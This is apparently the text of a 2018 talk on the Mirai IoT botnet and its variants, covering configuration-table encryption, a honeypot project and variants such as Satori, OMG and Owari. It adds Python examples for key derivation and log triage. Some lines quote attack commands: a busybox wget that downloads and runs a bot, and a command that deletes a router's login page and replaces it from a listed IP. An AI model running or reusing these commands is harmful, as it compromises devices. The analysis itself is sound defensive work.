IoT: Battle of the Bots
Overview
I. Brief introduction of Mirai
II. Anti-analysis and encryption of its configuration
III. Lab setup and honeypot
IV. Mirai variants
- Differences from the original Mirai
- Popular variants
August 31, 2018
Mirai Overview
Mirai’s first appearance
• Coded by Anna-senpai
• Source code released on Hackforums.net on Sep 20, 2016
Mirai’s Components
• Command and Control Server
• Report Server
• Loader
• Bot
  - Attack
  - Killer
  - Scanner
How Mirai Works
Bot Module: Attack
• Attack vectors
Anti-analysis and Encryption of Configuration Table
UPX header magic
Anti-analysis
dsjn 0xAD86570B
SNDJ 0x0DF0ADBA
RAW\x0 0xF596A4B5
KSL! 0x085A6508
upx 0x58550000
KTN! 0x0CE7790A
VEN! 0x47413509
ELF!
help
NOOB
GMT!
Configuration table
Configuration table decryption
table_key = 0xdeadbeef
Xor_key = 0x22
Xor Key Used
• ~47 Xor Keys identified
Commonly used keys:

| Table_key (seed) | Xor Key | Variants |
|---|---|---|
| 0xdeadbeef | 0x22 | 27 (including Mirai) |
| 0xdedefbaf | 0x54 | 17 |
| 0xdedeffba | 0x45 | 15 |
| `<none>` | 0x0 (not encrypted) | 13 |
| 0xdeacfbef | 0x66 | 11 |
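Added example (not code from the talk or the KAIB project): every Xor Key in the table above is the XOR of the four bytes of its seed, which is what Mirai's toggle_obf() amounts to, so an analyst can derive the key from any table_key and try the known seeds against a sample's data to recover C2 hostnames and other table strings. The seeds come from the slide; the obfuscated blob, its junk bytes and the host name are constructed for the demo.

```python
"""Mirai configuration-table key derivation and recovery (added example)."""
import re

# Seeds from the talk's table, plus 0 for the "not encrypted" rows. The
# single-byte XOR key each one yields is computed, not hard-coded.
KNOWN_SEEDS = (0xDEADBEEF, 0xDEDEFBAF, 0xDEDEFFBA, 0xDEACFBEF, 0x0)

# Table values are stored with a trailing NUL, so a decoded entry looks like
# a printable run followed by \x00; six characters keeps noise down.
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{6,}(?=\x00)")


def xor_key_from_seed(table_key: int) -> int:
    """Mirai's toggle_obf() XORs each byte with k1, k2, k3, k4 (the four
    bytes of table_key) in turn; XOR is associative, so that is one byte:
    0xdeadbeef -> 0xde ^ 0xad ^ 0xbe ^ 0xef = 0x22."""
    key = 0
    for shift in (0, 8, 16, 24):
        key ^= (table_key >> shift) & 0xFF
    return key


def toggle_obf(data: bytes, table_key: int) -> bytes:
    """Obfuscate or de-obfuscate one value; the operation is its own inverse."""
    key = xor_key_from_seed(table_key)
    return bytes(b ^ key for b in data)


def recover_strings(blob: bytes, table_key: int) -> list:
    """Decode a slice of a sample with a candidate seed and return the
    NUL-terminated printable strings (C2 host, credentials, applet names)."""
    plain = toggle_obf(blob, table_key)
    return [m.group(0).decode("ascii") for m in PRINTABLE_RUN.finditer(plain)]


def guess_seed(blob: bytes, seeds=KNOWN_SEEDS):
    """Triage step: try every known seed and keep the one that exposes the
    most readable entries; (None, []) means no known seed fits."""
    hits, seed = max((len(recover_strings(blob, s)), s) for s in seeds)
    if hits == 0:
        return None, []
    return seed, recover_strings(blob, seed)


# Constructed stand-in for a slice of a sample's .rodata: three values
# obfuscated with the stock seed and separated by junk bytes. The host name
# is a placeholder, not a real indicator.
_VALUES = [b"/bin/busybox MIRAI\x00", b"cnc.example.invalid\x00", b"enable\x00"]
SAMPLE_BLOB = b"\x00\x13\x37" + b"".join(
    toggle_obf(v, 0xDEADBEEF) + b"\xff\xfe" for v in _VALUES
)

if __name__ == "__main__":
    seed, entries = guess_seed(SAMPLE_BLOB)
    if seed is None:
        print("no known seed fits")
    else:
        print(f"seed 0x{seed:08x}, key 0x{xor_key_from_seed(seed):02x}: {entries}")
```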
Catching Live Samples with Honeypot
The KAIB Project
• Static analysis
• Automated decryption of the configuration table
• Unpacking if the packer is known
• Collection of C2 servers and download URLs
Results
• 21k+ samples collected
• 15k+ are Mirai-related samples
• 120+ variants identified
• 500+ C2s blacklisted
Honeypot Setup
• Low interaction
• Logs Telnet login attempts
• Logs URLs from wget download attempts
• Automatically downloads samples
Identifying Mirai Variants
Mirai was named after the strings in the command it runs and the response it expects:
• /bin/busybox MIRAI
• MIRAI: applet not found
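Added example (not the talk's honeypot code) covering the honeypot logging above and the naming rule here: it parses a constructed Telnet session log, counts the credentials tried, tags each source by the token in its /bin/busybox probe (MIRAI, OWARI, ...), and collects the wget URLs an automated sample collector would fetch. The log format, addresses, credentials and URLs are assumed.

```python
"""Triage of Telnet honeypot sessions for Mirai-style activity (added example)."""
import re
from collections import Counter

# Constructed log, one event per line: "<timestamp> <peer> <LOGIN|CMD> <payload>".
# Addresses, credentials and URLs are placeholders; a real honeypot's format differs.
SAMPLE_LOG = """\
2018-08-30T10:01:02Z 198.51.100.7 LOGIN root:admin
2018-08-30T10:01:03Z 198.51.100.7 CMD enable
2018-08-30T10:01:03Z 198.51.100.7 CMD /bin/busybox MIRAI
2018-08-30T10:01:04Z 198.51.100.7 CMD cd /tmp; busybox wget http://203.0.113.9/bins/x86 -O x; chmod 777 x; ./x
2018-08-30T10:02:10Z 198.51.100.8 LOGIN admin:admin
2018-08-30T10:02:11Z 198.51.100.8 CMD /bin/busybox OWARI
2018-08-30T10:02:12Z 198.51.100.8 CMD busybox wget http://203.0.113.9/owari.arm7 -O /tmp/.a
garbage line that should be skipped
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (LOGIN|CMD) (.*)$")
# The applet probe sent right after login; the token after busybox is what the
# talk uses to tell variants apart (MIRAI, OWARI, ...).
APPLET_RE = re.compile(r"/bin/busybox ([A-Za-z0-9_.-]+)\s*$")
# First URL argument of a (busybox) wget, allowing flags before it.
WGET_RE = re.compile(r"\bwget\s+(?:-\S+\s+)*(https?://\S+)")


def triage(log_text: str) -> dict:
    """Summarize one log: credentials tried, variant tag per source, and the
    download URLs an automated collector would fetch for static analysis."""
    creds = Counter()
    variants = {}
    urls = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsable lines are skipped, not guessed at
        _ts, peer, kind, payload = m.groups()
        if kind == "LOGIN":
            creds[payload] += 1
            continue
        probe = APPLET_RE.search(payload)
        if probe:
            variants[peer] = probe.group(1)
        for url in WGET_RE.findall(payload):
            urls.append((peer, variants.get(peer, "unknown"), url))
    return {"credentials": creds, "variants": variants, "urls": urls}


if __name__ == "__main__":
    for peer, tag, url in triage(SAMPLE_LOG)["urls"]:
        print(f"{peer} ({tag}): {url}")
```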
Chart: Variant Count, x-axis <2018, Jan-18, Feb-18, Mar-18, Apr-18, May-18, Jun-18, Jul-18, Aug-18; values as read from the chart: 14, 41, 50, 65, 76, 81, 98, 117, 127.
![Page 29: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/29.jpg)
29
Samples processed (2018)
Chart: Sample Count per month, January through August 2018; values as read from the chart: 2704, 2374, 1729, 3607, 1405, 2268, 4268, 2851.
Sample Count per Variant
Chart: count per variant (y-axis: Count, 0 to 6000).
Targeted Architecture
ARM 32-bit architecture (AARCH32)
MIPS I Architecture
Hitachi SuperH
SPARC
Motorola 68000
Intel 80386
PowerPC
Intel 80860
AMD x86-64 architecture
IBM System/370 Processor
Targeted Architecture
ARC International ARCompact processor
• Discovered January 2018
• Initially used by Okiru variant
• 1.5 billion products are dispatched per year
Other Variants joining the ARC:
MASUTA, SAUCE, OMNI, chickenxings, ROOT, WICKED
Exploits
• 28 Exploits
• At least 16 are Unauthenticated exploits
• 14 exploits are from 2017 & 2018
Airlink101, Apache Hadoop, ASUS, AVTECH, Claymore, Dasan, Digitalzoomstudio, D-LINK, GoAhead, Huawei, JAWS, MikroTik, Netgear, NUUO, Realtek, Tutos, Vacron, Zyxel
Main Variants
Satori/Okiru
• Believed to be coded by NexusZeta
• One of the most popular mods of Mirai
• Loader embedded in the bot
• Added the ARC architecture to its targets
• Uses exploits to spread
• One version mines cryptocurrency
Satori/Okiru
Scan port 3333: Exploit that targets Claymore software (ETH mining) in order to change the destination wallet
Satori/Okiru
3.336721 ETH approx 3.3k USD in January 2018
OMG
• Turns the IoT device into a proxy server
• Contains the original Mirai modules (attack, killer, scanner)
• Brute-forces logins to spread
• Discovered February 2018
OMG
• Uses 3Proxy, an open-source proxy server
• Generates 2 random ports for the HTTP and SOCKS proxies
OMG
• Adds firewall rule to allow traffic on the generated ports
Owari-Sora-Wicked-Omni
• The author calls himself “Wicked” with his friend “Karmaahof”
• Sora uses Aboriginal Linux
• Commonly uses exploits other than default passwords
• 11 exploits were found in use in one sample
Owari-Sora-Wicked-Omni
• Scans specific ports by initiating a raw-socket SYN
• For an established connection, it attempts to send a specific exploit to the device
Owari-Sora-Wicked-Omni
rm -rf /web/html/login.html
busybox wget
http://185.246.152.173/me
me -O /web/html/login.html
Final thoughts
• More exploits will be added
• More variants will be appearing
• Changes to the encryption of the configuration table
• Other means to monetize infected IoT devices
QUESTIONS?